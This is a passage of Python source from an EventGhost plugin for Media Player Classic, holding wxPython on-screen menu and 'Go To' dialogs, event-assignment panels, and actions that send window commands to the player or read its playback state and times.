this event !!!\n\n\n def onEscape(self, event):\n wx.CallAfter(self.destroyMenu)\n return True #stop processing this event !!!\n\n\n def GoTo(\n self,\n ):\n data = self.GoToCtrl.GetValue()\n if data >= self.total:\n return\n wx.CallAfter(\n self.plugin.SendCopydata,\n CMD_SETPOSITION,\n str(GetSec(data))\n )\n self.destroyMenu()\n\n\n def onFrameCharHook(self, event):\n keyCode = event.GetKeyCode()\n if keyCode == wx.WXK_F4:\n if event.AltDown():\n self.destroyMenu()\n elif keyCode == wx.WXK_RETURN or keyCode == wx.WXK_NUMPAD_ENTER:\n self.GoTo()\n elif keyCode == wx.WXK_RIGHT or keyCode == wx.WXK_NUMPAD_RIGHT:\n self.MoveCursor(1)\n elif keyCode == wx.WXK_ESCAPE:\n self.destroyMenu()\n elif keyCode == wx.WXK_UP or keyCode == wx.WXK_NUMPAD_UP:\n self.Turn(1)\n elif keyCode == wx.WXK_DOWN or keyCode == wx.WXK_NUMPAD_DOWN:\n self.Turn(-1)\n elif keyCode == wx.WXK_LEFT or keyCode == wx.WXK_NUMPAD_LEFT:\n self.MoveCursor(-1)\n else:\n event.Skip()\n\n\n def onClose(self, event):\n self.Show(False)\n self.Destroy()\n if self.plugin:\n self.plugin.menuDlg = None\n if self.gotowin and IsWindow(self.gotowin):\n PostMessage(self.gotowin, WM_CLOSE, 0, 0)\n\n\n def destroyMenu(self):\n if self.flag:\n self.timer.Cancel()\n for evt in self.evtList[0]:\n eg.Unbind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Unbind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Unbind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Unbind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Unbind(evt, self.onEscape)\n eg.TriggerEvent(\"OSD.%s\" % self.plugin.text.closed, prefix = \"MPC\")\n self.Close()\n#===============================================================================\n\nclass MenuEventsDialog(wx.MiniFrame):\n\n def __init__(self, parent, plugin):\n wx.MiniFrame.__init__(\n self,\n parent,\n -1,\n style=wx.CAPTION,\n name=\"MenuEventsDialog\"\n )\n self.panel = parent\n self.plugin = plugin\n self.evtList = cpy(self.panel.evtList)\n self.SetBackgroundColour(wx.NullColour)\n self.ctrl = None\n self.sel = -1\n\n\n def ShowMenuEventsDialog(self, title, labels):\n self.panel.Enable(False)\n self.panel.dialog.buttonRow.cancelButton.Enable(False)\n self.panel.EnableButtons(False)\n self.SetTitle(title)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.SetMinSize((450, 308))\n topSizer=wx.GridBagSizer(2, 20)\n textLbl_0=wx.StaticText(self, -1, labels[0])\n id = wx.NewId()\n eventsCtrl_0 = EventListCtrl(self, id, self.evtList, 0, self.plugin)\n eventsCtrl_0.SetItems(self.evtList[0])\n dt0 = MyTextDropTarget(eventsCtrl_0)\n eventsCtrl_0.SetDropTarget(dt0)\n textLbl_1=wx.StaticText(self, -1, labels[1])\n id = wx.NewId()\n eventsCtrl_1 = EventListCtrl(self, id, self.evtList, 1, self.plugin)\n eventsCtrl_1.SetItems(self.evtList[1])\n dt1 = MyTextDropTarget(eventsCtrl_1)\n eventsCtrl_1.SetDropTarget(dt1)\n textLbl_2=wx.StaticText(self, -1, labels[2])\n id = wx.NewId()\n eventsCtrl_2 = EventListCtrl(self, id, self.evtList, 2, self.plugin)\n eventsCtrl_2.SetItems(self.evtList[2])\n dt2 = MyTextDropTarget(eventsCtrl_2)\n eventsCtrl_2.SetDropTarget(dt2)\n textLbl_3=wx.StaticText(self, -1, labels[3])\n id = wx.NewId()\n eventsCtrl_3 = EventListCtrl(self, id, self.evtList, 3, self.plugin)\n eventsCtrl_3.SetItems(self.evtList[3])\n dt3 = MyTextDropTarget(eventsCtrl_3)\n eventsCtrl_3.SetDropTarget(dt3)\n textLbl_4=wx.StaticText(self, -1, labels[4])\n id = wx.NewId()\n eventsCtrl_4 = EventListCtrl(self, id, self.evtList, 4, self.plugin)\n eventsCtrl_4.SetItems(self.evtList[4])\n dt4 = MyTextDropTarget(eventsCtrl_4)\n eventsCtrl_4.SetDropTarget(dt4)\n deleteSizer = wx.BoxSizer(wx.VERTICAL)\n delOneBtn = wx.Button(self, -1, self.plugin.text.popup[0])\n delBoxBtn = wx.Button(self, -1, self.plugin.text.popup[1])\n clearBtn = wx.Button(self, -1, self.plugin.text.clear)\n deleteSizer.Add(delOneBtn, 1, wx.EXPAND)\n deleteSizer.Add(delBoxBtn, 1, wx.EXPAND|wx.TOP,5)\n deleteSizer.Add(clearBtn, 1, wx.EXPAND|wx.TOP,5)\n\n topSizer.Add(textLbl_0, (0,0))\n topSizer.Add(eventsCtrl_0, (1,0), flag = wx.EXPAND)\n topSizer.Add(textLbl_1, (0,1))\n topSizer.Add(eventsCtrl_1, (1,1), flag = wx.EXPAND)\n topSizer.Add(textLbl_2, (2,0),flag = wx.TOP, border = 8)\n topSizer.Add(eventsCtrl_2, (3,0), flag = wx.EXPAND)\n topSizer.Add(textLbl_3, (2,1), flag = wx.TOP, border = 8)\n topSizer.Add(eventsCtrl_3, (3,1), flag = wx.EXPAND)\n topSizer.Add(textLbl_4, (4,0), flag = wx.TOP, border = 8)\n topSizer.Add(eventsCtrl_4, (5,0), flag = wx.EXPAND)\n topSizer.Add(deleteSizer, (5,1), flag = wx.EXPAND)\n\n line = wx.StaticLine(self, -1, size=(20,-1),pos = (200,0), style=wx.LI_HORIZONTAL)\n btn1 = wx.Button(self, wx.ID_OK)\n btn1.SetLabel(self.plugin.text.ok)\n btn1.SetDefault()\n btn2 = wx.Button(self, wx.ID_CANCEL)\n btn2.SetLabel(self.plugin.text.cancel)\n btnsizer = wx.StdDialogButtonSizer()\n btnsizer.AddButton(btn1)\n btnsizer.AddButton(btn2)\n btnsizer.Realize()\n sizer.Add(topSizer,0,wx.ALL,10)\n sizer.Add(line, 0, wx.EXPAND|wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM,5)\n sizer.Add(btnsizer, 0, wx.EXPAND|wx.RIGHT, 10)\n sizer.Add((1,6))\n self.SetSizer(sizer)\n sizer.Fit(self)\n\n\n def onFocus(evt):\n ctrl = evt.GetValue()\n if ctrl != self.ctrl:\n if self.ctrl:\n self.ctrl.SetItemState(-1, wx.LIST_MASK_STATE, wx.LIST_STATE_SELECTED)\n self.ctrl = ctrl\n sel = self.ctrl.sel\n if sel != -1:\n self.sel = sel\n flag = self.ctrl.GetSelectedItemCount() > 0\n delOneBtn.Enable(flag)\n delBoxBtn.Enable(flag)\n evt.Skip()\n eventsCtrl_0.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_1.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_2.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_3.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_4.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n\n\n def onDelOneBtn(evt):\n self.ctrl.OnDeleteButton()\n delOneBtn.Enable(False)\n delBoxBtn.Enable(False)\n evt.Skip()\n delOneBtn.Bind(wx.EVT_BUTTON, onDelOneBtn)\n\n\n def onDelBoxBtn(evt):\n self.ctrl.OnDeleteAllButton()\n delOneBtn.Enable(False)\n delBoxBtn.Enable(False)\n evt.Skip()\n delBoxBtn.Bind(wx.EVT_BUTTON, onDelBoxBtn)\n\n\n def onClearBtn(evt):\n eventsCtrl_0.DeleteAllItems()\n eventsCtrl_1.DeleteAllItems()\n eventsCtrl_2.DeleteAllItems()\n eventsCtrl_3.DeleteAllItems()\n eventsCtrl_4.DeleteAllItems()\n delOneBtn.Enable(False)\n delBoxBtn.Enable(False)\n self.evtList = [[],[],[],[],[]]\n evt.Skip()\n clearBtn.Bind(wx.EVT_BUTTON, onClearBtn)\n\n\n def onClose(evt):\n self.panel.Enable(True)\n self.panel.dialog.buttonRow.cancelButton.Enable(True)\n self.panel.EnableButtons(True)\n self.GetParent().GetParent().Raise()\n self.Destroy()\n self.panel.setFocus()\n self.Bind(wx.EVT_CLOSE, onClose)\n\n\n def onCancel(evt):\n self.panel.Enable(True)\n self.panel.dialog.buttonRow.cancelButton.Enable(True)\n self.panel.EnableButtons(True)\n self.Close()\n btn2.Bind(wx.EVT_BUTTON,onCancel)\n\n\n def onOK(evt):\n self.panel.evtList = self.evtList\n self.Close()\n btn1.Bind(wx.EVT_BUTTON,onOK)\n\n sizer.Layout()\n self.Raise()\n self.Show()\n#===============================================================================\n\nclass Menu(wx.Frame):\n\n def __init__(self):\n wx.Frame.__init__(\n self,\n None,\n -1,\n 'MPC_menu',\n style = wx.STAY_ON_TOP|wx.SIMPLE_BORDER\n )\n self.flag = False\n self.monitor = 0\n self.oldMenu = []\n self.messStack = []\n\n\n def DrawMenu(self, ix):\n self.Show(False)\n self.menuGridCtrl.SetGridCursor(ix, 1)\n self.menuGridCtrl.SelectRow(ix)\n monDim = GetMonitorDimensions()\n try:\n x,y,ws,hs = monDim[self.monitor]\n except IndexError:\n x,y,ws,hs = monDim[0]\n # menu height calculation:\n h=self.GetCharHeight()+4\n for i in range(len(self.choices)):\n self.menuGridCtrl.SetRowSize(i,h)\n self.menuGridCtrl.SetCellValue(i,1,\" \"+self.choices[i])\n if self.items[i][3] == -1:\n self.menuGridCtrl.SetCellValue(i,2, u\"\\u25ba\")\n height0 = len(self.choices)*h\n height1 = h*((hs-20)/h)\n height = min(height0, height1)+6\n # menu width calculation:\n width_lst=[]\n for item in self.choices:\n width_lst.append(self.GetTextExtent(item+' ')[0])\n width = max(width_lst)+8\n self.menuGridCtrl.SetColSize(0,self.w0)\n self.menuGridCtrl.SetColSize(1,width)\n self.menuGridCtrl.SetColSize(2,self.w2)\n self.menuGridCtrl.ForceRefresh()\n width = width + self.w0 + self.w2\n if height1 < height0:\n width += SYS_VSCROLL_X\n if width > ws-50:\n if height + SYS_HSCROLL_Y < hs:\n height += SYS_HSCROLL_Y\n width = ws-50\n width += 6\n x_pos = x + (ws - width)/2\n y_pos = y + (hs - height)/2\n self.SetDimensions(x_pos,y_pos,width,height)\n self.menuGridCtrl.SetDimensions(2,2,width-6,height-6,wx.SIZE_AUTO)\n self.Show(True)\n self.Raise()\n\n\n def ShowMenu(\n self,\n fore,\n back,\n foreSel,\n backSel,\n fontInfo,\n flag,\n plugin,\n event,\n monitor,\n hWnd,\n evtList,\n ix = 0\n ):\n self.fore = fore\n self.back = back\n self.foreSel = foreSel\n self.backSel = backSel\n self.fontInfo = fontInfo\n self.flag = flag\n self.plugin = plugin\n self.monitor = monitor\n self.hWnd = hWnd\n self.evtList = evtList\n eg.TriggerEvent(\"OSD.%s\" % self.plugin.text.opened, prefix = \"MPC\")\n for evt in self.evtList[0]:\n eg.Bind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Bind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Bind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Bind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Bind(evt, self.onEscape)\n if self.plugin.GetWindowState() == 4: # Fullscreen !\n SendMessageTimeout(self.hWnd, WM_COMMAND, 830, 0)\n self.messStack.append(830)\n sleep(0.1)\n self.menu = GetMenu(hWnd)\n while not self.menu:\n SendMessageTimeout(self.hWnd, WM_COMMAND, 817, 0)\n self.messStack.append(817)\n sleep(0.1)\n self.menu = GetMenu(hWnd)\n self.items = GetItemList(self.menu, self.hWnd)\n self.choices = [item[0] for item in self.items]\n self.menuGridCtrl = MenuGrid(self,len(self.choices))\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(mainSizer)\n mainSizer.Add(self.menuGridCtrl, 0, wx.EXPAND)\n self.Bind(wx.EVT_CLOSE, self.onClose)\n self.Bind(gridlib.EVT_GRID_CMD_CELL_LEFT_DCLICK, self.onDoubleClick, self.menuGridCtrl)\n self.Bind(wx.EVT_CHAR_HOOK, self.onFrameCharHook)\n font = wx.FontFromNativeInfoString(fontInfo)\n self.menuGridCtrl.SetFont(font)\n arial = wx.FontFromNativeInfoString(arialInfoString)\n self.SetFont(font)\n hght = self.GetTextExtent('X')[1]\n for n in range(1,1000):\n arial.SetPointSize(n)\n self.SetFont(arial)\n h = self.GetTextExtent(u\"\\u25a0\")[1]\n if h > hght:\n break\n arial.SetPointSize(2*n/3)\n self.SetFont(arial)\n self.w0 = 2 * self.GetTextExtent(u\"\\u25a0\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)\n self.menuGridCtrl.SetColAttr(0,attr)\n for n in range(1,1000):\n arial.SetPointSize(n)\n self.SetFont(arial)\n h = self.GetTextExtent(u\"\\u25ba\")[1]\n if h > hght:\n break\n arial.SetPointSize(n/2)\n self.SetFont(arial)\n self.w2 = 2 * self.GetTextExtent(u\"\\u25ba\")[0]\n attr = gridlib.GridCellAttr()\n attr.SetFont(arial)\n attr.SetAlignment(wx.ALIGN_RIGHT, wx.ALIGN_CENTRE)\n self.menuGridCtrl.SetColAttr(2,attr)\n self.SetFont(font)\n self.SetBackgroundColour((0, 0, 0))\n self.menuGridCtrl.SetBackgroundColour(self.back)\n self.menuGridCtrl.SetForegroundColour(self.fore)\n self.menuGridCtrl.SetSelectionBackground(self.backSel)\n self.menuGridCtrl.SetSelectionForeground(self.foreSel)\n if self.flag:\n self.timer=MyTimer(t = 5.0, plugin = self.plugin)\n self.DrawMenu(ix)\n wx.Yield()\n SetEvent(event)\n\n\n def UpdateMenu(self, ix=0):\n self.items = GetItemList(self.menu, self.hWnd)\n if len(self.items)==0:\n PlaySound('SystemExclamation', SND_ASYNC)\n self.menu,ix = self.oldMenu.pop()\n self.items = GetItemList(self.menu, self.hWnd)\n self.choices = [item[0] for item in self.items]\n self.menuGridCtrl.Set(self.items)\n self.DrawMenu(ix)\n\n\n def MoveCursor(self, step):\n max=len(self.choices)\n if max > 0:\n self.menuGridCtrl.MoveCursor(step)\n\n\n def onUp(self, event):\n wx.CallAfter(self.menuGridCtrl.MoveCursor, -1)\n return True #stop processing this event !!!\n\n\n def onDown(self, event):\n wx.CallAfter(self.menuGridCtrl.MoveCursor, 1)\n return True #stop processing this event !!!\n\n\n def onLeft(self, event):\n if len(self.oldMenu) > 0:\n self.menu, ix = self.oldMenu.pop()\n wx.CallAfter(self.UpdateMenu, ix)\n else:\n wx.CallAfter(self.destroyMenu)\n return True #stop processing this event !!!\n\n\n def onRight(self, event):\n wx.CallAfter(self.DefaultAction)\n return True #stop processing this event !!!\n\n\n def onEscape(self, event):\n wx.CallAfter(self.destroyMenu)\n return True #stop processing this event !!!\n\n\n def DefaultAction(self):\n sel = self.menuGridCtrl.GetSelection()\n item = self.items[sel]\n id = item[3]\n if id != -1:\n self.destroyMenu()\n SendMessage(self.hWnd, WM_COMMAND, id, 0)\n else:\n self.oldMenu.append((self.menu,sel))\n self.menu = GetSubMenu(self.menu, item[1])\n self.UpdateMenu()\n\n\n def onFrameCharHook(self, event):\n keyCode = event.GetKeyCode()\n if keyCode == wx.WXK_F4:\n if event.AltDown():\n self.destroyMenu()\n elif keyCode == wx.WXK_RETURN or keyCode == wx.WXK_NUMPAD_ENTER:\n self.DefaultAction()\n elif keyCode == wx.WXK_RIGHT or keyCode == wx.WXK_NUMPAD_RIGHT:\n self.DefaultAction()\n elif keyCode == wx.WXK_ESCAPE:\n self.destroyMenu()\n elif keyCode == wx.WXK_UP or keyCode == wx.WXK_NUMPAD_UP:\n self.menuGridCtrl.MoveCursor(-1)\n elif keyCode == wx.WXK_DOWN or keyCode == wx.WXK_NUMPAD_DOWN:\n self.menuGridCtrl.MoveCursor(1)\n elif keyCode == wx.WXK_LEFT or keyCode == wx.WXK_NUMPAD_LEFT:\n if len(self.oldMenu) > 0:\n self.menu, ix = self.oldMenu.pop()\n wx.CallAfter(self.UpdateMenu,ix)\n else:\n self.destroyMenu()\n else:\n event.Skip()\n\n\n def onDoubleClick(self, event):\n self.DefaultAction()\n event.Skip()\n\n\n def onClose(self, event):\n self.Show(False)\n self.Destroy()\n self.plugin.menuDlg = None\n\n\n def destroyMenu(self, event = None):\n cnt = self.messStack.count(817)\n if cnt:\n for i in range(4 - cnt):\n SendMessageTimeout(self.hWnd, WM_COMMAND, 817, 0)\n if self.messStack.count(830):\n SendMessageTimeout(self.hWnd, WM_COMMAND, 830, 0)\n for evt in self.evtList[0]:\n eg.Unbind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Unbind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Unbind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Unbind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Unbind(evt, self.onEscape)\n if self.flag:\n self.timer.Cancel()\n eg.TriggerEvent(\"OSD.%s\" % self.plugin.text.closed, prefix = \"MPC\")\n self.Close()\n#===============================================================================\n\nclass MyTimer():\n\n def __init__(self, t, plugin):\n self.timer = Timer(t, self.Run)\n self.plugin = plugin\n self.timer.start()\n\n\n def Run(self):\n try:\n self.plugin.menuDlg.destroyMenu()\n self.plugin.menuDlg = None\n except:\n pass\n\n\n def Cancel(self):\n self.timer.cancel()\n#===============================================================================\n\nclass AfterPlaybackOnce(eg.ActionClass):\n\n class text:\n label = \"Select action after playback:\"\n choices = (\n \"Exit\",\n \"Stand By\",\n \"Hibernate\",\n \"Shutdown\",\n \"Log Off\",\n \"Lock\"\n )\n\n\n def __call__(self, action = -1):\n if action > -1:\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n return SendMessage(self.plugin.mpcHwnd, WM_COMMAND, action + 912, 0)\n else:\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(self, action):\n return \"%s: %s\" % (self.name, self.text.choices[action])\n\n\n def Configure(self, action = -1):\n panel = eg.ConfigPanel()\n label = wx.StaticText(panel, -1, self.text.label)\n ctrl = wx.Choice(panel, -1, choices = self.text.choices)\n eg.EqualizeWidths((label, ctrl))\n ctrl.SetSelection(action)\n panel.sizer.Add(label, 0, wx.TOP, 20)\n panel.sizer.Add(ctrl, 0, wx.TOP, 3)\n while panel.Affirmed():\n panel.SetResult(ctrl.GetSelection())\n#===============================================================================\n\nclass AfterPlayback(eg.ActionClass):\n\n class text:\n label = \"Select action after playback (every time):\"\n choices = (\n \"Exit\",\n \"Do Nothing\",\n \"Play next in the folder\",\n )\n\n\n def __call__(self, action = -1):\n if action > -1:\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n ids = (33411, 918, 33412)\n return SendMessageTimeout(\n self.plugin.mpcHwnd,\n WM_COMMAND,\n ids[action],\n 0\n )\n else:\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(self, action):\n return \"%s: %s\" % (self.name, self.text.choices[action])\n\n\n def Configure(self, action = -1):\n panel = eg.ConfigPanel()\n label = wx.StaticText(panel, -1, self.text.label)\n ctrl = wx.Choice(panel, -1, choices = self.text.choices)\n eg.EqualizeWidths((label, ctrl))\n ctrl.SetSelection(action)\n panel.sizer.Add(label, 0, wx.TOP, 20)\n panel.sizer.Add(ctrl, 0, wx.TOP, 3)\n while panel.Affirmed():\n panel.SetResult(ctrl.GetSelection())\n#===============================================================================\n\nclass UserMessage(eg.ActionClass):\n\n name = \"Send user's message\"\n description = u\"\"\"**Sends user's message.**\n\nIf you can not find in the menu of features some of the functions you can get it (maybe) add yourself.\nGo to the menu \"**View - Options... - Player - Hotkeys**\".\nIf you find there a function, what you need, then write the number that is in the column \"**ID**\".\nType this number into the edit box \"**User message ID:**\".\nYou can of course also use an expression such as **{eg.result}** or **{eg.event.payload}**.\"\"\"\n\n\n class text:\n label = \"User message ID:\"\n error = \"ValueError: invalid literal for int() with base 10: '%s'\"\n\n\n\n def __call__(self, val=\"\"):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n try:\n val = eg.ParseString(val)\n val = int(val)\n except:\n raise self.Exception(self.text.error % val)\n return\n return SendMessage(self.plugin.mpcHwnd, WM_COMMAND, val, 0)\n else:\n raise self.Exceptions.ProgramNotRunning\n\n\n def Configure(self, val=\"\"):\n panel = eg.ConfigPanel()\n textLabel = wx.StaticText(panel, -1, self.text.label)\n textControl = wx.TextCtrl(panel, -1, val, size = (200,-1))\n panel.sizer.Add(textLabel, 0, wx.TOP, 20)\n panel.sizer.Add(textControl, 0, wx.TOP, 3)\n while panel.Affirmed():\n panel.SetResult(textControl.GetValue())\n#===============================================================================\n\nclass ActionPrototype(eg.ActionBase):\n\n def __call__(self):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n wx.CallAfter(SendMessage,self.plugin.mpcHwnd, WM_COMMAND, self.value, 0)\n#===============================================================================\n\nclass GetWindowState(eg.ActionBase):\n\n class text:\n rbLabel = \"Result type choice\"\n numVal = \"Return a numeric value\"\n strVal = \"Return a string value\"\n boolVal = \"Return True when window is \"\n triggEvent = \"Trigger an event\"\n evtPrefix = \"Event prefix (or prefix and first suffix):\"\n states = (\n \"Not running\",\n \"Tray icon\",\n \"Normal\",\n \"Minimized\",\n \"Maximized\",\n \"Full screen\",\n )\n\n def __call__(self, mode = 0, state = 5, evnt = False, prefix = \"MPCHC.Window\"):\n stt = self.plugin.GetWindowState()\n if evnt:\n eg.TriggerEvent(\n \"\".join([word.capitalize() for word in self.text.states[stt+1].split()]),\n prefix = prefix\n )\n if mode == 0:\n return stt\n elif mode == 1:\n return self.text.states[stt+1]\n else:\n return stt == state-1\n\n\n def Configure(self, mode = 0, state = 5, evnt = False, prefix = \"MPCHC.Window\"):\n self.stt = state\n panel=eg.ConfigPanel(self)\n topSizer = wx.StaticBoxSizer(\n wx.StaticBox(panel, -1, self.text.rbLabel),\n wx.VERTICAL\n )\n boolSizer = wx.BoxSizer(wx.HORIZONTAL)\n rb0 = panel.RadioButton(mode==0, self.text.numVal, style=wx.RB_GROUP)\n rb1 = panel.RadioButton(mode==1, self.text.strVal)\n rb2 = panel.RadioButton(mode==2, self.text.boolVal)\n statChoice = wx.Choice(panel, -1, choices = self.text.states)\n statChoice.Select(state)\n triggCtrl = wx.CheckBox(panel, -1, self.text.triggEvent)\n triggCtrl.SetValue(evnt)\n prefixLabel = wx.StaticText(panel, -1, self.text.evtPrefix)\n prefixCtrl = wx.TextCtrl(panel, -1, prefix)\n prefixSizer = wx.BoxSizer(wx.HORIZONTAL)\n prefixSizer.Add(prefixLabel,0,wx.TOP,3)\n prefixSizer.Add(prefixCtrl,0,wx.LEFT,6)\n boolSizer.Add(rb2,0,wx.TOP,3)\n boolSizer.Add(statChoice)\n topSizer.Add(rb0,0,wx.TOP,3)\n topSizer.Add(rb1,0,wx.TOP,7)\n topSizer.Add(boolSizer,0,wx.TOP,5)\n panel.sizer.Add(topSizer)\n panel.sizer.Add(triggCtrl, 0, wx.TOP, 10)\n panel.sizer.Add(prefixSizer, 0, wx.TOP, 10)\n\n def onTriggCtrl(evt = None):\n flg = triggCtrl.GetValue()\n prefixLabel.Show(flg)\n prefixCtrl.Show(flg)\n if evt:\n evt.Skip()\n triggCtrl.Bind(wx.EVT_CHECKBOX, onTriggCtrl)\n onTriggCtrl()\n\n def onState(evt):\n self.stt = evt.GetSelection()\n evt.Skip()\n statChoice.Bind(wx.EVT_CHOICE, onState)\n\n def onRadio(evt = None):\n flg = rb2.GetValue()\n statChoice.Enable(flg)\n sel = self.stt if flg else -1\n statChoice.SetSelection(sel)\n if evt:\n evt.Skip()\n rb0.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb1.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb2.Bind(wx.EVT_RADIOBUTTON, onRadio)\n onRadio()\n\n while panel.Affirmed():\n state = state if self.stt == -1 else self.stt\n panel.SetResult(\n (rb0.GetValue(),rb1.GetValue(),rb2.GetValue()).index(True),\n state,\n triggCtrl.GetValue(),\n prefixCtrl.GetValue()\n )\n#===============================================================================\n\nclass GetPlayState(eg.ActionBase):\n\n class text:\n rbLabel = \"Result type choice\"\n numVal = \"Return a numeric value\"\n strVal = \"Return a string value\"\n boolVal = \"Return True when play state is \"\n states = (\"Playing\", \"Paused\", \"Stopped\", \"Unknown\")\n\n def __call__(self, mode = 0, state = 0):\n stt = self.plugin.playstate\n if mode == 0:\n return stt\n elif mode == 1:\n return self.text.states[stt]\n else:\n return stt == state\n\n\n def Configure(self, mode = 0, state = 0):\n self.stt = state\n panel=eg.ConfigPanel(self)\n topSizer = wx.StaticBoxSizer(\n wx.StaticBox(panel, -1, self.text.rbLabel),\n wx.VERTICAL\n )\n boolSizer = wx.BoxSizer(wx.HORIZONTAL)\n rb0 = panel.RadioButton(mode==0, self.text.numVal, style=wx.RB_GROUP)\n rb1 = panel.RadioButton(mode==1, self.text.strVal)\n rb2 = panel.RadioButton(mode==2, self.text.boolVal)\n statChoice = wx.Choice(panel, -1, choices = self.text.states)\n statChoice.Select(state)\n boolSizer.Add(rb2,0,wx.TOP,3)\n boolSizer.Add(statChoice)\n topSizer.Add(rb0,0,wx.TOP,3)\n topSizer.Add(rb1,0,wx.TOP,7)\n topSizer.Add(boolSizer,0,wx.TOP,5)\n panel.sizer.Add(topSizer)\n\n\n def onState(evt):\n self.stt = evt.GetSelection()\n evt.Skip()\n statChoice.Bind(wx.EVT_CHOICE, onState)\n\n def onRadio(evt = None):\n flg = rb2.GetValue()\n statChoice.Enable(flg)\n sel = self.stt if flg else -1\n statChoice.SetSelection(sel)\n if evt:\n evt.Skip()\n rb0.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb1.Bind(wx.EVT_RADIOBUTTON, onRadio)\n rb2.Bind(wx.EVT_RADIOBUTTON, onRadio)\n onRadio()\n\n while panel.Affirmed():\n state = state if self.stt == -1 else self.stt\n panel.SetResult(\n (rb0.GetValue(),rb1.GetValue(),rb2.GetValue()).index(True),\n state,\n )\n#===============================================================================\n\nclass GetNowPlaying(eg.ActionBase):\n\n def __call__(self):\n hWnd = Find_MPC()\n if not hWnd:\n raise self.Exceptions.ProgramNotRunning\n hWnd = hWnd[0]\n title = GetWindowText(hWnd)\n if not title.startswith(\"Media Player Classic\"):\n ix = title.rfind(\".\")\n if ix > -1:\n return title[:ix]\n#===============================================================================\n\nclass GetTimes(eg.ActionBase):\n\n name = \"Get Times\"\n description = \"Returns elapsed, remaining and total times.\"\n\n def __call__(self):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n try:\n child = GetDlgItem(self.plugin.mpcHwnd, 10021)\n if GetClassName(child) == \"#32770\":\n statText = GetDlgItem(child, 12027)\n if GetClassName(statText) == \"Static\":\n elaps, total = GetWindowText(statText).split(\" / \")\n elaps = GetSec(elaps)\n totSec = GetSec(total)\n rem = strftime('%H:%M:%S', gmtime(totSec-elaps))\n elaps = strftime('%H:%M:%S', gmtime(elaps))\n total = strftime('%H:%M:%S', gmtime(totSec))\n except:\n return None, None, None\n return elaps, rem, total\n else:\n eg.programCounter = None\n raise self.Exceptions.ProgramNotRunning\n#===============================================================================\n\nclass GoTo_OSD(eg.ActionBase):\n\n name = 'On Screen Go To ...'\n description = 'Show On Screen \"Go To ...\".'\n\n panel = None\n\n class text:\n OSELabel = '\"Go To...\" show on:'\n menuPreview = '\"Go To...\" OSD preview:'\n txtColour = 'Text colour'\n background = 'Background colour'\n txtColourSel = 'Selected text colour'\n backgroundSel = 'Selected background colour'\n gotoLabel = 'Go To...'\n dialog = \"Events ...\"\n btnToolTip = '''Press this button to assign events to control the \"Go To...\" OSD !!!'''\n evtAssignTitle = '\"Go To...\" OSD control - events assignement'\n events = (\n \"Digit increment:\",\n \"Digit decrement:\",\n \"Kursor left:\",\n \"Kursor right:\",\n \"Cancel (Escape):\",\n )\n fontFace = \"Select font face\"\n fontSize = \"Select font size\"\n inverted = \"Use inverted colours\"\n\n def __call__(\n self,\n fore,\n back,\n faceFont,\n sizeFont,\n monitor,\n foreSel,\n backSel,\n evtList,\n sizeFlag,\n inverted\n ):\n if self.plugin.runFlg and self.plugin.mpcHwnd:\n if not self.plugin.menuDlg:\n self.plugin.menuDlg = GoToFrame()\n self.event = CreateEvent(None, 0, 0, None)\n wx.CallAfter(self.plugin.menuDlg.ShowGoToFrame,\n fore,\n back,\n foreSel,\n backSel,\n faceFont,\n sizeFont,\n False,\n self.plugin,\n self.event,\n monitor,\n self.plugin.mpcHwnd,\n evtList,\n sizeFlag\n )\n eg.actionThread.WaitOnEvent(self.event)\n else:\n eg.programCounter = None\n raise self.Exceptions.ProgramNotRunning\n\n\n def GetLabel(\n self,\n fore,\n back,\n faceFont,\n sizeFont,\n monitor,\n foreSel,\n backSel,\n evtList,\n sizeFlag,\n inverted\n ):\n return self.name\n\n\n def Configure(\n self,\n fore = (75, 75, 75),\n back = (180, 180, 180),\n faceFont = \"Courier New\",\n sizeFont = 40,\n monitor = 0,\n foreSel = (180, 180, 180),\n backSel = (75, 75, 75),\n evtList = [[],[],[],[],[]],\n sizeFlag = False,\n inverted = True\n ):\n self.fore = fore\n self.back = back\n self.foreSel = foreSel\n self.backSel = backSel\n self.oldSel=0\n self.inverted = inverted\n global panel\n panel = eg.ConfigPanel(self)\n panel.evtList = cpy(evtList)\n previewLbl=wx.StaticText(panel, -1, self.text.menuPreview)\n displayChoice = eg.DisplayChoice(panel, monitor)\n w = displayChoice.GetSize()[0]\n OSElbl = wx.StaticText(panel, -1, self.text.OSELabel)\n #Button Text Colour\n foreLbl=wx.StaticText(panel, -1, self.text.txtColour+':')\n foreColourButton = eg.ColourSelectButton(panel,fore, title = self.text.txtColour)\n #Button Background Colour\n backLbl=wx.StaticText(panel, -1, self.text.background+':')\n backColourButton = eg.ColourSelectButton(panel,back, title = self.text.background)\n #Button Selected Text Colour\n 